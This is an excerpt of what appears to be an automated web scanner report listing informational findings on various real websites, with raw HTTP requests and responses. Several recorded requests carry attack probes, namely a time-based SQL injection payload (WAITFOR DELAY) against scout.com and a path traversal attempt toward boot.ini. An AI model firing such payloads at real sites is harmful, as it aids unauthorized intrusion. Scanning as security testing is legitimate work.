<li><a href="https://netsparker.zendesk.com/forums/132382-videos/entries" target="_blank">Netsparker Videos</a>
...[SNIP]...
<li><a href="https://netsparker.zendesk.com/forums/130236-faq/entries" target="_blank">FAQ</a> </li> <li><a href="https://netsparker.zendesk.com/forums/130203-tips-tricks/entries" target="_blank">Tips &amp; Tricks</a>
...[SNIP]...
<li><a href="https://netsparker.zendesk.com/entries/123164-known-issues-limitations" target="_blank">Known Issues and Limitations</a>
...[SNIP]...
<p>Help Desk: <a href="https://netsparker.zendesk.com/" target="_blank">https://netsparker.zendesk.com/</a>
...[SNIP]...
24.79. http://www.millersweld.com/landing.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.millersweld.com
Path:   /landing.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /landing.php?d=millersweld.com HTTP/1.1
Host: www.millersweld.com
Proxy-Connection: keep-alive
Referer: http://www.millersweld.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=r00990b0n1b9uo8re3ehhh4ie6

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI COR NID ADMa DEVa PSAa PSDa STP NAV DEM STA PRE"
Vary: Accept-Encoding
Content-type: text/html
Connection: close
Date: Fri, 06 May 2011 19:10:01 GMT
Server: lighttpd
Content-Length: 21198

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>millers
...[SNIP]...
<td class="title2">

<a href="http://domainbrokers.com/index.php?page=offer&amp;domain=millersweld.com" target="_blank">Click here to make an offer on this domain name</a>
...[SNIP]...
24.80. http://www.millersweld.com/top.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.millersweld.com
Path:   /top.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /top.php?d=millersweld.com HTTP/1.1
Host: www.millersweld.com
Proxy-Connection: keep-alive
Referer: http://www.millersweld.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=r00990b0n1b9uo8re3ehhh4ie6

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI COR NID ADMa DEVa PSAa PSDa STP NAV DEM STA PRE"
Vary: Accept-Encoding
Content-type: text/html
Connection: close
Date: Fri, 06 May 2011 19:10:00 GMT
Server: lighttpd
Content-Length: 2318

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>popup management</title>
<script
...[SNIP]...
<p><img border="0" src="http://hf.davinci.com/static/common/images/spacer.gif" width="0" height="0" alt=""></p>
...[SNIP]...
24.81. http://www.neospire.net/security-and-compliance/PCI-DSS.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.neospire.net
Path:   /security-and-compliance/PCI-DSS.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /security-and-compliance/PCI-DSS.php?utm_source=Google&utm_medium=ppc&utm_campaign=pci-magic&utm_keyword=%252BPCI%2520%252Bcompliance&gclid=CIbrp9zV1KgCFd8D5QodQ0sogw HTTP/1.1
Host: www.neospire.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:22:19 GMT
Server: Apache
Set-Cookie: PHPSESSID=6083a42a7356a1bdbe27f3e50b8622e1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 81911

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...
<div class="header_blank_button"><a href='https://server.iad.liveperson.net/hc/12856738/?cmd=file&file=visitorWantsToChat&site=12856738&byhref=1&imageUrl=https://server.iad.liveperson.nethttp://www.neospire.net/images/live_person/' target='chat12856738' onClick="javascript:window.open('https://server.iad.liveperson.net/hc/12856738/?cmd=file&file=visitorWantsToChat&site=12856738&imageUrl=https://server.iad.liveperson.nethttp://www.neospire.net/images/live_person/&referrer='+escape(document.location),'chat12856738','width=475,height=400,resizable=yes');return false;" ><img src="/images/header_button_chat.jpg" border="0" alt="Log In to NeoSpire's customer portal for support and service" />
...[SNIP]...
<div class="contentnav_box_image_left"><a href="https://sealserver.trustwave.com/cert.php?customerId=w6ordzrNftNVfsRlPlMpi3XmFoIqDb&amp;size=105x54&amp;style=normal" target="_blank"><img src="/images_contentnav/100_trustwave.gif" alt="NeoSpire, Inc. is enrolled in Trustwave's Trusted Commerce program" border="0" align="right" hspace="10" vspace="4" />
...[SNIP]...
<div id="path_icons">

<a href="http://twitter.com/neospire" target="_blank"><img src="/images/button_twitter.jpg" width="24" height="24" border="0" alt="Follow NeoSpire on Twitter" /></a>

<a href="http://www.facebook.com/NeoSpire" target="_blank"><img src="/images/button_facebook.jpg" width="24" height="24" border="0" alt="Become a Fan on Facebook" />
...[SNIP]...
</script>
<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()"><img src="/images/button_share_grey.jpg" width="84" height="24" alt="Bookmark and Share" style="border:0"/></a><script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<!-- BEGIN LivePerson Button Code -->
<a href='https://server.iad.liveperson.net/hc/12856738/?cmd=file&file=visitorWantsToChat&site=12856738&byhref=1&imageUrl=https://server.iad.liveperson.nethttp://www.neospire.net/images/live_person/' target='chat12856738' onClick="javascript:window.open('https://server.iad.liveperson.net/hc/12856738/?cmd=file&file=visitorWantsToChat&site=12856738&imageUrl=https://server.iad.liveperson.nethttp://www.neospire.net/images/live_person/&referrer='+escape(document.location),'chat12856738','width=475,height=400,resizable=yes');return false;" ><img src="/images/button_chat_green.jpg" width="144" height="24" border="0" alt="Chat Instantly with a Product Specialist" />
...[SNIP]...
</a> &nbsp; . &nbsp; <a href='https://server.iad.liveperson.net/hc/12856738/?cmd=file&amp;file=visitorWantsToChat&amp;site=12856738&amp;byhref=1&amp;imageUrl=https://server.iad.liveperson.nethttp://www.neospire.net/images/live_person/' target='chat12856738' onclick="javascript:window.open('https://server.iad.liveperson.net/hc/12856738/?cmd=file&amp;file=visitorWantsToChat&amp;site=12856738&amp;imageUrl=https://server.iad.liveperson.nethttp://www.neospire.net/images/live_person/&amp;referrer='+escape(document.location),'chat12856738','width=475,height=400,resizable=yes');return false;" >Ask Us a Question</a>
...[SNIP]...
<div class="contentbox_inline_button"><a href='https://server.iad.liveperson.net/hc/12856738/?cmd=file&amp;file=visitorWantsToChat&amp;site=12856738&amp;byhref=1&amp;imageUrl=https://server.iad.liveperson.nethttp://www.neospire.net/images/live_person/' target='chat12856738' onclick="javascript:window.open('https://server.iad.liveperson.net/hc/12856738/?cmd=file&amp;file=visitorWantsToChat&amp;site=12856738&amp;imageUrl=https://server.iad.liveperson.nethttp://www.neospire.net/images/live_person/&amp;referrer='+escape(document.location),'chat12856738','width=475,height=400,resizable=yes');return false;" >Live Chat with a Specialist</a>
...[SNIP]...
</a><a href='https://server.iad.liveperson.net/hc/12856738/?cmd=file&file=visitorWantsToChat&site=12856738&byhref=1&imageUrl=https://server.iad.liveperson.nethttp://www.neospire.net/images/live_person/' target='chat12856738' onClick="javascript:window.open('https://server.iad.liveperson.net/hc/12856738/?cmd=file&file=visitorWantsToChat&site=12856738&imageUrl=https://server.iad.liveperson.nethttp://www.neospire.net/images/live_person/&referrer='+escape(document.location),'chat12856738','width=475,height=400,resizable=yes');return false;" ><img src="/images/button_chatwithspecialist.jpg" border="0" alt="NeoSpire Product Specialists are Always Available" />
...[SNIP]...
<!-- BEGIN LivePerson Button Code - FOOTER -->
<a href='https://server.iad.liveperson.net/hc/12856738/?cmd=file&file=visitorWantsToChat&site=12856738&byhref=1&imageUrl=https://server.iad.liveperson.nethttp://www.neospire.net/images/live_person/' target='chat12856738' onClick="javascript:window.open('https://server.iad.liveperson.net/hc/12856738/?cmd=file&file=visitorWantsToChat&site=12856738&imageUrl=https://server.iad.liveperson.nethttp://www.neospire.net/images/live_person/&referrer='+escape(document.location),'chat12856738','width=475,height=400,resizable=yes');return false;" ><img src="/images/bottom_contactbox_1.jpg" width="210" align="left" alt="ProActive Support sets NeoSpire apart. Call or email us 24 hours a day to learn how managed hosting is the smart choice for ente
...[SNIP]...
24.82. http://www.nutter.com/attorneys.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutter.com
Path:   /attorneys.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /attorneys.php?letter=G HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
Referer: http://www.nutter.com/attorneys.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:15:00 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 29605

<!-- attorneys start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19
...[SNIP]...
<div id="adFlashContent1"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a>
...[SNIP]...
<div id="adFlashContent2"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a>
...[SNIP]...
24.83. http://www.nutter.com/careers.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutter.com
Path:   /careers.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /careers.php?CategoryID=22&CareerID=4&subID=1 HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
Referer: http://www.nutter.com/careers.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:16:32 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 17106

<!-- careers start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<div id="adFlashContent1"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a>
...[SNIP]...
<div id="adFlashContent2"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a>
...[SNIP]...
24.84. http://www.scmagazineus.com/js/scripts.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scmagazineus.com
Path:   /js/scripts.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /js/scripts.js?4126252641 HTTP/1.1
Host: www.scmagazineus.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_chn_cvp%3D%255B%255B%2527referrers%2527%252C%25271303995569311%2527%255D%255D%7C1461848369310%3B%20s_key_cvp%3D%255B%255B%2527n/a%2527%252C%25271303995569312%2527%255D%255D%7C1461848369312%3B; __utmz=53791274.1303995582.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; __utma=53791274.422456328.1303995582.1303995582.1303995582.1; ASP.NET_SessionId=zpaunnv34zkpdxy4mysuxdoz

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 19 Apr 2011 19:39:54 GMT
Accept-Ranges: bytes
ETag: "0e1548ec9fecb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
From: Web2-VM
Date: Fri, 06 May 2011 21:49:56 GMT
Content-Length: 10552


var dc_tile=1;
var axel = Math.random() + "";
var ord = axel * 1000000000000000000;

function popWin(url) { // popup script copyright h1Web. We rule all!
w=window.open(url,"w","resizable=1,scro
...[SNIP]...
</a>';
}
else if (google_ads[0].type == "flash") {
s += '<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"' +
' codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0"' +
' WIDTH="' + google_ad.image_width +
'" HEIGHT="' + google_ad.image_height + '">' +
'<PARAM NAME="movie" VALUE="' + google_ad.image_url + '">
...[SNIP]...
24.85. http://www.scout.com/2/a.z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /2/a.z

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /2/a.z?cfg=%27;WAITFOR%20DELAY%20%270:0:25%27--&fromprefetch=1&p=26&s=143 HTTP/1.1
Host: www.scout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; RefId=0; BrandId=0; __utma=202704078.454375544.1303509265.1303516031.1303522301.3

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 19:29:27 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 19:39:01 GMT
Server: Microsoft-IIS/6.0
Server: Sodo
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Vary: Accept-Encoding
Content-Length: 11983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<link rel="stylesheet" type="text/css" media="all" href="http://cdn-cms.scout.com/css/layout-min.css" />
       <link rel="stylesheet" type="text/css" href="http://images.video.msn.com/js/ch/channels.css" />

       
                   <script type="text/javascript" src="http://cdn-cms.scout.com/js/ui-min.js">
...[SNIP]...
</script>
       <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
       <script type="text/javascript" src="http://images.video.msn.com/js/ch/channels.js"></script>
...[SNIP]...
<div class="left"><a class="logo" href="http://www.msn.com/"><img src="http://cdn-cms.scout.com/images/layout/msn.gif" alt="MSN" />
...[SNIP]...
<li><a href="http://entertainment.msn.com/">Entertainment</a>
...[SNIP]...
<li><a href="http://moneycentral.msn.com/home.asp">Money</a>
...[SNIP]...
<li><a href="http://lifestyle.msn.com/">Lifestyle</a>
...[SNIP]...
<li><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
</ul><a class="logo logo-bing" href="http://www.bing.com/search?FORM=FOXSP">Bing</a>
...[SNIP]...
<li><a class="img" href="http://www.foxsports.com/"><img src="http://cdn-cms.scout.com/images/layout/menu-item-fox-sports.gif" alt="FOXSports" />
...[SNIP]...
<li><a class="external" href="http://www.ticketcity.com/">Tickets</a>
...[SNIP]...
<p class="left"> <a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a> <a href="http://g.msn.com/0TO_/enus">Legal</a> <a href="http://advertising.msn.com/msn/">Advertise on MSN</a> <a href="http://g.msn.com/AIPRIV/en-us">About our ads</a> <a href="http://rss.msn.com/">RSS</a>
...[SNIP]...
24.86. http://www.scout.com/a.z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /a.z

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

POST /a.z?s=%27;WAITFOR%20DELAY%20%270:0:25%27--&p=9&c=2&cid=1037787&nid=4811607&fhn=1 HTTP/1.1
Referer: http://www.scout.com/a.z?s=143&p=9&c=2&cid=1037787&nid=4811607&fhn=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.scout.com
Cookie: RefId=0; BrandId=0; SessionBrandId=0
Accept-Encoding: gzip, deflate
Content-Length: 61

__VIEWSTATE=%2fwEPDwULLTEzNzQyNzE0MDlkZA%3d%3d&q=Search+Scout

Response

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 19:58:01 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb3
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Cache-Control: public, s-maxage=600
Expires: Fri, 06 May 2011 20:08:01 GMT
Content-Type: text/html
Content-Length: 12238

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<link rel="stylesheet" type="text/css" media="all" href="http://cdn-cms.scout.com/css/layout-min.css" />
       <link rel="stylesheet" type="text/css" href="http://images.video.msn.com/js/ch/channels.css" />

       
       <meta http-equiv="refresh" content="10;url=http://www.scout.com/" />
...[SNIP]...
</script>
       <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
       <script type="text/javascript" src="http://images.video.msn.com/js/ch/channels.js"></script>
...[SNIP]...
<div class="left"><a class="logo" href="http://www.msn.com/"><img src="http://cdn-cms.scout.com/images/layout/msn.gif" alt="MSN" />
...[SNIP]...
<li><a href="http://entertainment.msn.com/">Entertainment</a>
...[SNIP]...
<li><a href="http://moneycentral.msn.com/home.asp">Money</a>
...[SNIP]...
<li><a href="http://lifestyle.msn.com/">Lifestyle</a>
...[SNIP]...
<li><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
</ul><a class="logo logo-bing" href="http://www.bing.com/search?FORM=FOXSP">Bing</a>
...[SNIP]...
<li><a class="img" href="http://www.foxsports.com/"><img src="http://cdn-cms.scout.com/images/layout/menu-item-fox-sports.gif" alt="FOXSports" />
...[SNIP]...
<li><a class="external" href="http://www.ticketcity.com/">Tickets</a>
...[SNIP]...
<p class="left"> <a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a> <a href="http://g.msn.com/0TO_/enus">Legal</a> <a href="http://advertising.msn.com/msn/">Advertise on MSN</a> <a href="http://g.msn.com/AIPRIV/en-us">About our ads</a> <a href="http://rss.msn.com/">RSS</a>
...[SNIP]...
<noscript>
       <img src="http://pt200191.unica.com/ntpagetag.gif?js=0&amp;site=scout.com" height="1" width="1" border="0" hspace="0" vspace="0" alt="" />
       <img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=3000001&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cj=1" />
   </noscript>
...[SNIP]...
24.87. http://www.secureworks.com/compliance/comp/pci.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.secureworks.com
Path:   /compliance/comp/pci.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /compliance/comp/pci.html?_kk=6713825b-9989-43cb-8a7b-5c5635138b40&_kt=6426467207&gclid=CMm21t3V1KgCFcPd4AodU3_CiA HTTP/1.1
Host: www.secureworks.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:23:03 GMT
Server: Apache
Vary: Accept-Encoding
Cache-Control: public, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69185


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
   <head>        
<!-- Set content headers-->
<meta http-equiv="ExpiresDefault
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.js" ></script>
...[SNIP]...
<li><a href="http://theenergydaily.com/pressreleases/electricity/201001111000PR_NEWS_USPR_____CL34889.html" target="_blank"><em>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1065139613/?label=GQcuCK-1nAIQnfvy-wM&amp;guid=ON&amp;script=0"/>
</div>
...[SNIP]...
24.88. http://www.socialfollow.com/button/image/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.socialfollow.com
Path:   /button/image/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /button/image/?b=../../../../../../../../../../boot.ini HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.socialfollow.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>FireHost Protection</title>
...[SNIP]...
<div id="pageWrapper">
       <img id="logo" src="http://resources.firehost.com/images/logos/FireHost-control-panel.png" alt="FireHost Secure Cloud Hosting" /><br />
...[SNIP]...
<p>Please email <img src="http://resources.firehost.com/images/waf/eblock.gif" /> and provide the following information such that we may investigate and resolve this blocked action.</p>
...[SNIP]...
<div id="footer">
           <a href="http://www.firehost.com"><img src="http://www.firehost.com/protected/FireHost-white.jpg" alt="Secure Cloud Hosting" border="0" /></a>
...[SNIP]...
25. Cross-domain script include  previous  next
There are 73 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

25.1. http://allatsea.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://allatsea.net
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: allatsea.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:06:35 GMT
Server: Apache/2.0.52 (CentOS)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 49257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
<div class="sidebarBuffer">
<script type="text/javascript" src="http://static.ak.connect.facebook.com/connect.php/en_US"></script>
...[SNIP]...
<!-- Include the Google Friend Connect javascript library. -->
<script type="text/javascript" src="http://www.google.com/friendconnect/script/friendconnect.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
